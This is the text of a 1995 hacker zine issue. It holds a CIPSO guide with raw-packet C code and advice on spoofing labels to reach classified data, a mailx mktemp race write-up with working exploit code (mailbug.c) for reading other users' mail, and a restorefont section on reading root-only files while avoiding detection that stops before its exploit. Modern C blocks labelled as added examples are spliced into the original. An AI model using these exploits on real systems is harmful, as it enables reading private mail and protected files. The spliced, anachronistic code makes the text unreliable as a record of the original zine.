
Fuxin Eleet Haxor 04


/IIIIIIIIII /IIIIIIIII /III /III
\ III_____/ \ III____/ \ III \ III
\ III \ III \ III \_III
\ IIIIIIII \ IIIIIIIII \ IIIIIIIIII
\ III___/ \ III____/ \ III__/ III
\ III \ III \ III \ III
\ III ___ \ IIIIIIIII ___ \ III \ III ___
\__/ /\__\ \/________/ /\__\ \/__/ \/__/ /\__\
\/__/ \/__/ \/__/
ashionably legant ackers

Issue #4
December 26th, 1995

Editor: ReDragon

Official FEH Distribution Sites: ftp.fc.net /pub/defcon/FEH
ftp.2600.com /pub/publications/feh

No More Greetz
(You already know if yer eleet)

FEH #4
The Saga Continues

By all accounts, this is our first issue actually delivered on time, and
what is easily the best one yet. Previous issues I wondered if there was
really a place for FEH, and if I would ever put out another issue. Well,
there is no more wondering, the answer is quite clear. Yes. What made it
so clear in my mind is that this really IS the best voice of hackers out
there. The yardstick by which many zines are judged is phrack. This isn't
phrack. And I don't want it to be. Erik Bloodaxe, despite all the best
intentions on his part, has run phrack into the ground, and it is time to
lay it to rest, and to let the hackers move on. And so, where will you find
the hearts of real hackers, what puts a smile on the face of the real hackers,
where the pulse of the hacker community lies. It is here, it is FEH.
-ReDragon


<---------------------------------------------------------------------------->

Table of Contents

General Stuff:
Intro
Table of Contents
/var/spool/mail/feh

Technical Articles:
A Guide to CIPSO by Mythrandir
Linux 'mail-x' Security Holes by FEH Staff
Linux 'restorefont' Security Holes by FEH Staff
Linux 'filter' Security Holes by FEH Staff
IRC DCC Protocol Security Holes by FEH Staff
Example Packet Construction Code by SnoNinja

Serious Articles:
Breakfast with the Secret Service by Kamakize
Some Thoughts on Hacking by Mythrandir
Gray Areas: Who's on your side? by FEH Staff

Entertaining Articles:
#hack Quotes by SnoNinja
The Word List by Allen 3. Smith
Macs vs. PCs by nicotine
Haxoring an ATM Machine by shadow tao
Department Store Paging by Tele Monster
The Tales of Oof by t3
The Elite Speak Filter by SnoNinja
DefCon Reviews and Other Thoughts by Zeed


<---------------------------------------------------------------------------->
/var/spool/mail/feh


To: All XXXXX Bell Employees

The Corporate Information Security organization would like to take
this opportunity to remind everyone that the Holiday season is when
computer hackers usually take opportunities to attempt to `break into'
computer systems. During this time, employees take vacations and
fewer people are present in buildings to watch computer systems which
allow hackers more time to attempt their tricks. We would ask that
each employee who is responsible for a computer system (yes, this
includes that personal computer on your desktop, as well as those
multi-user systems) to take precautions to insure no unauthorized
person has the ability to access the computer system and the
information on the system.

For employees with a personal computer:
if possible, turn it off and use the key to lock the system. make
certain start-up passwords are active (e.g., LOCKIT, XLOCK). put
software and data diskettes in a secure (locked) location. turn off
any modem attached to the PC. perform a routine backup.

For system administrators with mid-range computers:
change the `root' password at the console. insure audit logs are
working properly. take a system backup. for those systems with
SysGuard installed, insure detective tools are working as expected.
upon return from holiday, review the audit logs for unsuccessful login
attempts, usage of `root' userid, and any other suspicious activity.

For all employees:
remember, hackers try to use social engineering to convince you to
give them information they shouldn't have. upon return from holiday,
check the `last login' message for each system to make certain it is
the last time you accessed it.

This advisory is not meant to be an answer for every possible security
precaution, but a reminder that securing company resources is the
responsibility of every employee and should be treated as a part of
each person's job. Contact the Computer Security Administration Group
at (xxx) xxx-xxxx with questions or for assistance.

---

"Nation-wide callerid went into effect on December first. As you are
aware, FCC rules calling for nation-wide delivery of calling party number
information went into effect. For some unexplained reason, Bell South
test calls indicate that long distance carriers are not passing calling
party number information. Bell South is in the process of contacting
each carrier to ask for explanations and corrective actions. Until we
have more information, there seems to be no point in referring the
complaining customers to the carriers. The following verbiage should be
used to state our position on this matter to complaining customers:
'Bell South network is fully compliant with the FCC order and will
deliver the calling party number both to and from long distance
carriers. We are working with carriers in those instances where the
calling party number is not being delivered to identify problems and to
ensure full compliance with the FCC order.'"


<---------------------------------------------------------------------------->

A Guide to the Common Internet Protocol Security Option
by Mythrandir (mythrndr@infonexus.com)

Some of you may have noticed that not all networks or operating systems
respond to the reception of common IP packets anymore. In the struggle to
maintain a secure network, recent innovations have been made in the area of
trusted systems. Trusted systems can maintain and ensure that access to
different classifications of data is properly restricted.

One method of maintaining this access control over a network is the common
internet protocol security option (CIPSO). CIPSO allows hosts to communicate
data in a generic manner so that its security levels and methods of handling
can be understood by other machines. Hosts with different internal
implementations of a trusted environment can still interact over the network
and maintain their levels of security via CIPSO.

CIPSO is implemented by creating a new IP option (RFC 791). This option
will allow both the kernel and the user (dependent on implementation) to add
the option and thus specify the security level of a packet.

The basic format of a CIPSO option in an IP packet is as follows:

+-------------------------------------------------------------------------+
| OOOOOOOO | LLLLLLLL | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD | TTTTTTTT...     |
+-------------------------------------------------------------------------+
  Option     Length     Domain of interpretation           Tag Information
  Number
  1 Byte     1 Byte     4 Bytes (Long)                     >= 4 Bytes

The option number is a one octet number. This should be 134 (decimal).

The length field specifies the length in bytes of the entire cipso option.
This includes the header information (option, length, doi) as well as the tag
information. This number cannot exceed 40 due to ip header length restrictions.

The domain of interpretation is a 4 octet number. This number specifies which
type of security interpretation should be used. A host will check if it
understands this number before it accepts a packet.

+-------------------------------------------------------------------------+
| tttttttt | llllllll | iiiiiiiiiiiiiiiiiiii....                          |
+-------------------------------------------------------------------------+
  Tag Type   Length     Tag fields
  1 octet    1 octet    variable

Tag type is a one octet number which specifies the format of the tag.
The numbers 1 - 127 are reserved for standard tag definitions. 128-255 can
be assigned by a DOI authority. This is simply a local network definition.

Length is a one octet number which specifies the length of the tag. This
includes the tag type, length field, and the tag fields. This number cannot
exceed 34, again for reasons due to the ip header length restriction of 60
bytes.

A standard tag type. (very common)

Tag Type 1

+-------------------------------------------------------------------------+
| AAAAAAAA | SSSSSSSS | BBBBBBBBBBBBBBBBBBBBB.......                      |
+-------------------------------------------------------------------------+
  Alignment  Sensitivity  Bit map of categories
  1 octet    1 octet      variable

The alignment field is a 1 octet number. It is always set to zero. Its
purpose is to simply align the bit map along an even boundary.

The sensitivity field is a 1 octet number which specifies the sensitivity
level of the data. This could represent classified, secret, top secret, etc..

The bit map is a variable length field which can be from 0 to 30 bytes long.
This is used to contain more specific sensitivity information on a segment
of data. This is implementation specific.

The packet level implementation is very straightforward, and can be used
in a wide variety of ways to control the data contained in the packets.
The first is to only allow certain levels of sensitivity to pass through
specific interfaces. In other words, you can configure it to handle multiple
interfaces and pass top secret data through one interface and unclassified
data through a different network interface. Or you could make a card allow
unclassified data through, and reject passing of any classified data into an
unclassified network. This allows filtering based on the sensitivity of data.
The important point to note here is that filtering takes place at the kernel
level, NOT the user level.
Also, CIPSO can be used so that when a host passes a piece of data across
the network, the other host will assign the correct level of security to a
data stream. The host can then assure that only authorized users can access
the data that they are cleared for.
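
The receive side of the format described above, as an added example that is
not part of the original article: a parser that enforces the stated limits
(option 134, option length at most 40, tag length at most 34, alignment 0)
before a label is trusted, plus a per-interface sensitivity check. The names
cipso_parse and cipso_permit, the min/max range model and the sample bytes
are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPOPT_CIPSO   134  /* option number from the article */
#define CIPSO_MAX_LEN 40   /* whole option, header included */
#define CIPSO_HDR_LEN 6    /* option number + length + 4-byte DOI */
#define TAG_MAX_LEN   34   /* one tag, its type and length octets included */
#define TAG1_HDR_LEN  4    /* tag type + length + alignment + sensitivity */

enum cipso_status {
    CIPSO_OK, CIPSO_NOT_CIPSO, CIPSO_TRUNCATED,
    CIPSO_BAD_LEN, CIPSO_UNKNOWN_DOI, CIPSO_BAD_TAG
};

struct cipso_label {
    uint32_t doi;
    uint8_t  sensitivity;
    uint8_t  bitmap[TAG_MAX_LEN - TAG1_HDR_LEN];  /* 0 to 30 bytes */
    size_t   bitmap_len;
};

/* Parse one CIPSO option holding a type 1 tag. `opt` points at the option
 * number octet, `avail` is how many bytes of IP option space remain, and
 * `local_doi` is the only DOI this host understands (an assumption: a real
 * host may know several). `out` is written only on CIPSO_OK. */
enum cipso_status cipso_parse(const uint8_t *opt, size_t avail,
                              uint32_t local_doi, struct cipso_label *out)
{
    size_t optlen, taglen, tag_space;
    const uint8_t *tag;
    uint32_t doi;

    if (avail < 2)
        return CIPSO_TRUNCATED;
    if (opt[0] != IPOPT_CIPSO)
        return CIPSO_NOT_CIPSO;

    optlen = opt[1];
    if (optlen < CIPSO_HDR_LEN + TAG1_HDR_LEN || optlen > CIPSO_MAX_LEN)
        return CIPSO_BAD_LEN;
    if (optlen > avail)                 /* length octet lies about the data */
        return CIPSO_TRUNCATED;

    /* The DOI is carried in network byte order. */
    doi = (uint32_t)opt[2] << 24 | (uint32_t)opt[3] << 16 |
          (uint32_t)opt[4] << 8  | (uint32_t)opt[5];
    if (doi != local_doi)
        return CIPSO_UNKNOWN_DOI;

    tag = opt + CIPSO_HDR_LEN;
    tag_space = optlen - CIPSO_HDR_LEN;
    taglen = tag[1];
    if (tag[0] != 1)                    /* only tag type 1 is handled here */
        return CIPSO_BAD_TAG;
    if (taglen < TAG1_HDR_LEN || taglen > TAG_MAX_LEN || taglen > tag_space)
        return CIPSO_BAD_TAG;
    if (tag[2] != 0)                    /* alignment octet is always zero */
        return CIPSO_BAD_TAG;

    out->doi = doi;
    out->sensitivity = tag[3];
    out->bitmap_len = taglen - TAG1_HDR_LEN;
    memcpy(out->bitmap, tag + TAG1_HDR_LEN, out->bitmap_len);
    return CIPSO_OK;
}

/* Interface policy: pass the packet only if its sensitivity lies inside the
 * range configured for the interface (range model assumed for this example). */
int cipso_permit(const struct cipso_label *l, uint8_t lo, uint8_t hi)
{
    return l->sensitivity >= lo && l->sensitivity <= hi;
}

/* Constructed sample: DOI 0x12345678, sensitivity 1, 30-byte bit map. */
static const uint8_t sample_opt[CIPSO_MAX_LEN] = {
    134, 40, 0x12, 0x34, 0x56, 0x78,    /* option number, length, DOI */
    1, 34, 0, 1,                        /* tag type, tag length, align, level */
    0x80, 0x01                          /* bit map; remaining 28 bytes are 0 */
};

int main(void)
{
    struct cipso_label l;
    enum cipso_status st =
        cipso_parse(sample_opt, sizeof sample_opt, 0x12345678u, &l);

    if (st != CIPSO_OK) {
        printf("rejected, status %d\n", (int)st);
        return 1;
    }
    printf("doi=0x%08lx sensitivity=%u bitmap_len=%lu unclassified_if=%s\n",
           (unsigned long)l.doi, (unsigned)l.sensitivity,
           (unsigned long)l.bitmap_len,
           cipso_permit(&l, 0, 0) ? "pass" : "drop");
    return 0;
}
```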

And now that you've found it, what do you do? Well first off you should
sit back and watch the network. Try and determine which machines allow what
types of sensitivities. This is important so you will know what types you can
send to specific machines. It is also important to note the tags that are
sent with the classifications so that they are placed within the packets.
In order to get at sensitive data you will probably have to gain access to
send raw packets to the local network. At this point you will have to generate
raw ip packets which contain the CIPSO option in the header. This could be
incorporated in a telnet client. This will allow you to connect to the other
machines on the network assuming that you use the correct classification and
tag fields.

Now for the Code...

The first program will allow you to create an ECHO REQUEST ICMP packet with
a CIPSO option inside of it. This code is meant to be a base to write
something more interesting with. There are two files, cipso.h and
cipso_ping.c; just type gcc -o cping cipso_ping.c, run as root, and you are
set. This code was written on a linux box, but should be fairly portable to
other machines. Also, if you want to spoof your source address then you will
have to use the IP_HDRINCL socket option, which requires you to patch the raw.c
file if you are using a linux kernel.

Finally, for your listening pleasure, I've left a little snippet of code that
will listen for ICMP packets. It will simply print out the hex data of any
ICMP packets it receives. gcc -o ilisten icmp_listen.c and go.
This is also a great piece of code to use as a base for something more
interesting.

Best of Luck!

Mythrandir

Ways to Improve this Code:
Fix ilisten so the complete packet information is printed out.
Print out the entire ip header
the ip option
the icmp header
and the data
all in a nice neat form.

Be Elite! Use your Own Code!

--------- cipso.h ------ cut here ------
/*
 * CIPSO structures
 * By, Mythrandir
 */

#include <sys/types.h>
#include <stdint.h>

/* Packed so that every field sits at its wire offset (no compiler padding). */
struct cipso_opt {
    u_char   option_num;  /* Option number - should be 134 */
    u_char   length;      /* length - cannot exceed 40 */
    uint32_t doi;         /* Domain of Interpretation - 4 bytes */
    u_char   tag_data[1]; /* Tag data pointer */
} __attribute__((packed));

struct cipso_tag_type1 {
    u_char type;          /* Will be set to 1 */
    u_char length;        /* length - cannot exceed 34 */
    u_char alignment;     /* Alignment octet - always 0 */
    u_char sensitivity;   /* sensitivity label */
    u_char bitmap[1];     /* tag fields */
} __attribute__((packed));

------ end of cipso.h ----- cut here ------

------ cipso_ping.c ------ cut here -------

/*
 * CIPSO Ping
 * This program demonstrates a simple method of creating a
 * cipso echo request packet. This is meant to be a base to write
 * other far more useful programs such as a cipso telnet client
 * or whatnot.
 * Remember, you may need to modify the sensitivity and the
 * bit map in order to get it to work correctly with a machine.
 * 1995 - Mythrandir
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "cipso.h"

#define DATA        "FEH Greetz your system."
#define DATA_SIZE   sizeof(DATA)
#define LOCAL_HOST  "127.0.0.1"
#define DOI         0x12345678
#define TAGBITMAP   "123456789012345678901234567890"
#define BITMAPSIZE  30
#define SENSITIVITY 1

/*
 * Data alignment numbers
 */
#define IP_START    0
#define CIPSO_START 20
#define ICMP_START  60  /* ihl = 15 words: 20 byte header + 40 byte option */
#define DATA_START  68  /* the 8 byte ICMP echo header ends here */

#define MAXPACKET   4096

struct sockaddr_in whereto;

/* Standard Internet checksum over len bytes starting at addr. */
unsigned short in_cksum(unsigned short *addr, int len)
{
    int nleft = len;
    unsigned short *w = addr;
    unsigned short answer;
    unsigned short odd_byte = 0;
    int sum = 0;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    if (nleft == 1) {
        *(unsigned char *)(&odd_byte) = *(unsigned char *) w;
        sum += odd_byte;
    }

    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

int main(int argc, char *argv[])
{
    int ntransmitted = 0;
    int ident = getpid() & 0xFFFF;
    int sock;
    int i;
    struct sockaddr_in *to = &whereto;
    struct hostent *hp;

    /* variables for doing a ping packet */
    unsigned char outpack[MAXPACKET];
    struct iphdr *ip = (struct iphdr *) &outpack[IP_START];
    struct cipso_opt *cipso = (struct cipso_opt *) &outpack[CIPSO_START];
    struct cipso_tag_type1 *tag1 = (struct cipso_tag_type1 *) cipso->tag_data;
    struct icmphdr *icp = (struct icmphdr *) &outpack[ICMP_START];
    unsigned char *datap = &outpack[DATA_START];

    /*
     * force user to enter host
     */
    if (argc < 2) {
        printf("%s: <hostname>\n", argv[0]);
        exit(1);
    }

    /*
     * Initialize everything
     */
    memset(&whereto, 0, sizeof(whereto));
    memset(outpack, 0, sizeof(outpack));
    to->sin_family = AF_INET;
    to->sin_addr.s_addr = inet_addr(argv[1]); /* already network byte order */

    if (to->sin_addr.s_addr == INADDR_NONE) {
        /* not a dotted quad, so try it as a host name */
        hp = gethostbyname(argv[1]);
        if (hp) {
            to->sin_family = hp->h_addrtype;
            memcpy(&to->sin_addr, hp->h_addr, hp->h_length);
        } else {
            fprintf(stderr, "%s: unknown host %s\n", argv[0], argv[1]);
            exit(1);
        }
    }

    /*
     * Open a Socket
     */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        printf("Error: Cannot Open RAW IP socket\n");
        exit(1);
    }
    printf("Opened RAW Socket\n");

    /*
     * Set up IP Header
     */
    ip->ihl = 15; /* set to 15 to include option in header */
    ip->version = 4;
    ip->tos = 0;
    ip->tot_len = htons(DATA_START + DATA_SIZE);
    ip->id = 0;
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = 1; /* ICMP Protocol */
    ip->check = 0;
    ip->saddr = inet_addr(LOCAL_HOST); /* Thanks to linux this means nothing. YET */
    ip->daddr = to->sin_addr.s_addr;

    /*
     * Set up Cipso Header
     */
    cipso->option_num = 134;
    cipso->length = 40;
    cipso->doi = htonl(DOI);

    /*
     * Set up cipso tag data
     */
    tag1->type = 1;
    tag1->length = 34;
    tag1->alignment = 0;
    tag1->sensitivity = SENSITIVITY;
    memcpy(tag1->bitmap, TAGBITMAP, BITMAPSIZE);

    /*
     * Set up ICMP Header and payload
     */
    icp->type = 8;
    icp->code = 0;
    icp->checksum = 0;
    icp->un.echo.sequence = ntransmitted++;
    icp->un.echo.id = ident;
    memcpy(datap, DATA, DATA_SIZE);

    /*
     * Compute ICMP checksum
     */
    icp->checksum = in_cksum((unsigned short *) icp, 8 + DATA_SIZE);

    /*
     * Compute IP checksum (header and options only)
     */
    ip->check = in_cksum((unsigned short *) ip, ICMP_START);

    /*
     * sendto(s, msg, len, flags, to, tolen)
     */
    i = sendto(sock, outpack, DATA_START + DATA_SIZE, 0,
               (struct sockaddr *) &whereto, sizeof(whereto));
    if (i < 0)
        perror("sendto");

    close(sock);
    exit(0);
}

--------- end of cipso_ping.c ------- cut here -------

------- icmp_listen.c ------- cut here -------

/*
 * Ping watch - A very very rough ICMP packet watcher
 * Simply displays hex values of packet
 * by, Mythrandir
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    int l, i, j;
    int sock;
    socklen_t length;
    struct sockaddr_in name;
    unsigned char buf[1024];

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (sock < 0) {
        printf("Cannot open Raw ICMP Socket.\n");
        exit(1);
    }

    memset(&name, 0, sizeof(name));
    name.sin_family = AF_INET;
    name.sin_addr.s_addr = INADDR_ANY;
    name.sin_port = 0;

    if (bind(sock, (struct sockaddr *) &name, sizeof name) < 0) {
        printf("Error binding ICMP socket");
        exit(1);
    }

    length = sizeof(name);
    if (getsockname(sock, (struct sockaddr *) &name, &length) < 0) {
        printf("Error: Can't get socket name\n");
        exit(1);
    }

    printf("Socket port #%d\n", ntohs(name.sin_port));

    for ( ; ; ) {
        if ((l = read(sock, buf, sizeof(buf))) < 0) {
            printf("Error receiving ICMP packet\n");
            continue;
        }
        if (l < 20)     /* too short to hold an IP header */
            continue;

        /*
         * Print out IP information
         */
        printf("Got ICMP Packet From: %d.%d.%d.%d\n",
               buf[12], buf[13], buf[14], buf[15]);
        printf("Got ICMP Packet To: %d.%d.%d.%d\n",
               buf[16], buf[17], buf[18], buf[19]);

        /*
         * Print IP Data, 16 bytes per row, never reading past the
         * l bytes that were actually received
         */
        for (i = 0; i < l; i += 16) {
            for (j = 0; j < 16; j++)
                if (i + j < l)
                    printf("%02x ", buf[i + j]);
                else
                    printf("   ");
            printf(" ");
            for (j = 0; j < 16 && i + j < l; j++)
                if ((buf[i + j] < 33) || (buf[i + j] > 126))
                    printf(".");
                else
                    printf("%c", buf[i + j]);
            printf("\n");
        }

        fflush(stdout);
    }

    close(sock);
    exit(0);
}

---------- end of icmp_listen.c ------- cut here --------

<---------------------------------------------------------------------------->

Linux 'mailx' Security Holes
by FEH Staff


There is a problem prevalent in the way many programs implement their
usage of mktemp() in order to create temporary files in /tmp, allowing users
on a machine to read and write to the contents of temporary files created.
The basic problem is that there is a race condition that exists between
the point that a program calls mktemp(), and the pathname returned by mktemp
is actually created. For some programs, the file creation is immediately
or almost immediately following the mktemp(), resulting in an extremely
small window of opportunity, and as a result making it very difficult to
exploit. However, there are other programs that do not immediately open
the file, and in these cases it is only a matter of getting the timing
right in order to exploit the hole.
To exploit this hole, simply create the file that mktemp() returns as
a valid temporary filename after mktemp() has been called, but before the
file has been opened, allowing the user running the program permissions to
read and write from that temporary file. The program will then succeed in
an fopen, and will write to the file, oblivious to the fact that it didn't
actually create the file, and that others can also read and write from the
file.
Note that most programs will immediately unlink() a temporary file, but
that does not delete it until after it is closed. Closing a file results in
the contents of it being flushed, and so by using a 'tail -f' or a similar
procedure, you can capture the contents of the file before it is removed
from the filesystem.
The filename returned by mktemp() is easily determined for most unix
platforms, allowing this bug to be exploited. For the linux libc, the
leftmost X in the template is replaced with a character starting at 'a'
(incremented through 'a'-'z', 'A'-'Z', and '0'-'9' if that file already
exists), and the rest of the X's are replaced with the process id
(0 padded). Other operating systems use a variation of this technique;
experimentation easily reveals the algorithm.
The generic procedure used to formulate an exploit for a particular program
with this bug is as follows:
  1. detect the execution of the program.
  2. determine the temporary filename that mktemp() will return
     when called by the program.
  3. determine the point at which mktemp() is called by the program,
     and immediately following that point, create the file, with
     rw permissions for the user who is running the program.
  4. read the contents of the temporary file, using a 'tail -f' or
     your own routines.
  5. if the sticky bit is set on /tmp, clean up your mess by rm'ing
     the temp file you created, since the unlink() called by the
     actual program will fail if you are the owner.

Linux's /bin/mail, as included in Slackware 3.0 (mailx 5.5), suffers
from this mktemp() problem in all temporary files it creates. It uses 5
temporary files with filenames generated during the program's initialization
in a tinit() function, and then uses them as it becomes necessary during the
program's execution. The race condition begins in this tinit() function.
The temporary files that can be exploited are as follows:

  /tmp/ReXXXXXX
    Used when a user selects 'e' from the mailx command prompt, to edit
    mail. The message the user has selected to edit is copied to the
    temporary file at this point, and then the editor is invoked on that
    temp file. The race condition ends when the user has selected 'e',
    and allows the message being edited to be read.
  /tmp/RsXXXXXX
    Used when a user sends mail, usually from the command line, such as:
    'mail dave'. The race condition ends when EOF is received from stdin,
    and the message is about to be sent, and allows the outgoing mail to
    be read.
  /tmp/RqXXXXXX
    Used when mail arrives into the mail spool while mail is currently
    running. The race condition ends when the program is preparing to
    shutdown, and allows the new contents of the mail spool to be read.
  /tmp/RmXXXXXX
    Used to prepend a message to the user's mbox file. Prepending
    requires the entire mbox contents to be read to the temporary file
    and then appended to the new message(s) being added to the file.
    This is disabled by default in Slackware 3.0 in the /etc/mail.rc
    by the use of the set append option. For this to be useful, that
    option needs to be removed from /etc/mail.rc, or an unset append
    needs to be added to the user executing mail's .mailrc file. The
    race condition ends when the program is preparing to shutdown.
  /tmp/RxXXXXXX
    Used to read messages from the user's mail spool. The race condition
    ends during the program's startup, when the mail spool is read, and
    allows any new mail in the user's spool to be read. Because there
    is no user input between tinit() and this point, it is the only
    race condition that isn't completely trivial to exploit.

The exploit that follows demonstrates the flaws in all but the final
temporary file. To use, wait for a mail process to execute, then call the
mailbug program with the process id as an argument, and finally execute a
tail -f /tmp/R*, and let it run until the mail program has terminated
execution.
As an aside, there are a number of programs that are vulnerable to a
directed denial of service attack preventing people from using them by
creation of the 62 temporary files that are attempted to be used by mktemp(),
resulting in the failure of the program to run. By continuous running of a
program watching for these vulnerable programs to start, they can be prevented
from ever successfully executing (one such example of this is in.pop3d, which
would allow a denial of service attack preventing a specific user from
receiving mail through pop).

Program:                    mailx-5.5 (/bin/mail)
Affected Operating Systems: linux - Slackware 3.0, others with mailx-5.5
Requirements:               account on system, user using /bin/mail
Temporary Patch:            chmod o-x /usr/bin/Mail (ie: use something else)
Security Compromise:        any user with an account can read incoming,
                            edited, or outgoing mail if the mail is
                            processed by mailx.
Synopsis:                   The predictability of mktemp() is exploited to
                            create the temporary files after the filenames
                            have been determined but before they are actually
                            created, allowing the mail being dumped to those
                            temporary files to be read by the creator of the
                            files.

mailbug.c:
/* This program creates temporary files used by mailx (/bin/mail under
   Slackware 3.0), which can then be read by the program. This will
   exploit 4 of the 5 temporary files, the final temporary file is a
   tighter race condition, and is not handled by this code.
   Following execution of this program with the process id of mail that
   is running, execute 'tail -f /tmp/R*', redirecting to a file if desired,
   and allow it to run until the mail process has exited. This can be easily
   handled in a shell script, but is not included since it is not needed to
   sufficiently demonstrate the security flaw.
*/

#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void exploit_mktemp(char *dest, char *prepend, char *pid)
{
    int i;

    strcpy(dest, prepend);
    for (i = strlen(pid); i < 6; i++)
        strcat(dest, "0");
    strcat(dest, pid);
    dest[strlen(prepend)] = 'a';
}

int main(int argc, char **argv)
{
    char tmpf[5][80];   /* hold filename */

    umask(0);

    if (argc < 2) {
        printf("mailbug racer\nSyntax: %s process-id\n", argv[0]);
        return -1;
    }

    /* get mktemp filenames */
    exploit_mktemp(tmpf[0], "/tmp/Re", argv[1]);
    exploit_mktemp(tmpf[1], "/tmp/Rs", argv[1]);
    exploit_mktemp(tmpf[2], "/tmp/Rq", argv[1]);
    exploit_mktemp(tmpf[3], "/tmp/Rm", argv[1]);

    /* create temporary files */
    creat(tmpf[0], S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
    creat(tmpf[1], S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
    creat(tmpf[2], S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
    creat(tmpf[3], S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

    return 0;
}
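
The fix for the race described in this article, as an added example that is
not part of the original text or of mailx: the open that mktemp()+fopen()
amounts to, next to an exclusive create and mkstemp(), run against a file
that was pre-created world read/writable. The function names, the scratch
directory and the file name Rsa00042 are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* What fopen(name, "w") on a mktemp() name does: an existing file is
 * silently reused, whoever created it and whatever its mode is. */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Atomic create: fails with EEXIST if the name already exists, and never
 * follows a symlink planted at that name. */
int open_tmp_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: the name is chosen and the file created (mode 0600) in one
 * step. `tmpl` must end in XXXXXX and is overwritten with the real name. */
int open_tmp_mkstemp(char *tmpl)
{
    return mkstemp(tmpl);
}

/* 1 if the open file is readable or writable by anyone but its owner, or
 * is owned by someone else; 0 if private; -1 on error. */
int fd_exposed(int fd)
{
    struct stat st;

    if (fstat(fd, &st) < 0)
        return -1;
    return (st.st_mode & (S_IRWXG | S_IRWXO)) != 0 || st.st_uid != geteuid();
}

/* Plays the other local user: creates `path` first, mode 0666. */
int precreate_world_rw(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT, 0666);

    if (fd < 0)
        return -1;
    fchmod(fd, 0666);           /* same effect as the umask(0) in mailbug.c */
    close(fd);
    return 0;
}

struct race_result {
    int unsafe_exposed;   /* 1: the program writes into an exposed file */
    int excl_errno;       /* errno from the exclusive create */
    int mkstemp_exposed;  /* 0: mkstemp() produced a private file */
};

/* Runs all three variants inside a private scratch directory. */
int run_demo(struct race_result *r)
{
    char dir[] = "/tmp/mktemp-demo-XXXXXX";
    char victim[64], tmpl[64];
    int fd;

    if (!mkdtemp(dir))
        return -1;
    /* constructed name in the prefix + 'a' + padded pid shape */
    snprintf(victim, sizeof victim, "%s/Rsa00042", dir);
    snprintf(tmpl, sizeof tmpl, "%s/RsXXXXXX", dir);
    if (precreate_world_rw(victim) < 0)
        return -1;

    fd = open_tmp_unsafe(victim);
    r->unsafe_exposed = fd_exposed(fd);
    if (fd >= 0)
        close(fd);

    fd = open_tmp_excl(victim);
    r->excl_errno = fd < 0 ? errno : 0;
    if (fd >= 0)
        close(fd);

    fd = open_tmp_mkstemp(tmpl);
    r->mkstemp_exposed = fd_exposed(fd);
    if (fd >= 0)
        close(fd);

    unlink(victim);
    unlink(tmpl);
    rmdir(dir);
    return 0;
}

int main(void)
{
    struct race_result r;

    if (run_demo(&r) < 0)
        return 1;
    printf("unsafe open exposed=%d, O_EXCL errno=%d, mkstemp exposed=%d\n",
           r.unsafe_exposed, r.excl_errno, r.mkstemp_exposed);
    return 0;
}
```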





<---------------------------------------------------------------------------->

Linux 'restorefont' Security Holes
by FEH Staff

Linux's svgalib utilities, required to be suid root, have a problem in that
they do not revoke suid permissions before reading a file. This is exploited
in the restorefont utility, but similar bugs exist in other svgalib utilities.
The restorefont utility serves two functions. First, it will read a font from
a file and write it to the console as the font. Second, it will read a font
from the console and write it out to a file. Luckily, the specific bug
in restorefont can only be exploited if someone is at the console, reducing
its overall impact on the security of the system as a whole.
In writing the utilities, the authors are cognizant of the fact that when
writing out the font, suid permissions must first be given up; it is in fact
commented as such in the code. However, when reading in a font, the program
is still running with full suid root permissions. This allows us to read in
any file for the font that root could access (basically, anything).
The applicable code to read in the file is shown below:

    #define FONT_SIZE 8192
    unsigned char font[FONT_SIZE];

    if (argv[1][1] == 'r') {
        FILE *f;
        f = fopen(argv[2], "rb");
        if (f == NULL) {
          error:
            perror("restorefont");
            exit(1);
        }
        if (1 != fread(font, FONT_SIZE, 1, f)) {
            if (errno)
                goto error;
            puts("restorefont: input file corrupted.");
            exit(1);
        }
        fclose(f);

We can see from this that the file to be read in has to be at least 8k,
as if it is not, the program will produce an error and exit. If the file
is at least 8k, the first 8k are read into the buffer, and the program
proceeds to set whatever the contents of the file are to the font:

    vga_disabledriverreport();
    vga_setchipset(VGA); /* avoid SVGA detection */
    vga_init();
    vga_setmode(G640x350x16);
    vga_puttextfont(font);
    vga_setmode(TEXT);

At this point, the console will now look quite unreadable if you are
reading something other than a font from that file. But, the data that
is put into the font is left untouched and is readable using the -w option
of restorefont. We then read the font back from video memory to a new file,
and our job is complete, we have read the first 8k of a file we shouldn't
have had access to. To prevent detection of having run this, we probably
shouldn't leave an unreadable font on the screen, so we save and then restore
the original font before reading from the file.
The complete exploit is shown below:

Program:                    restorefont, a svgalib utility
Affected Operating Systems: linux
Requirements:               logged in at console
Security Compromise:        user can read first 8k of any file of at least
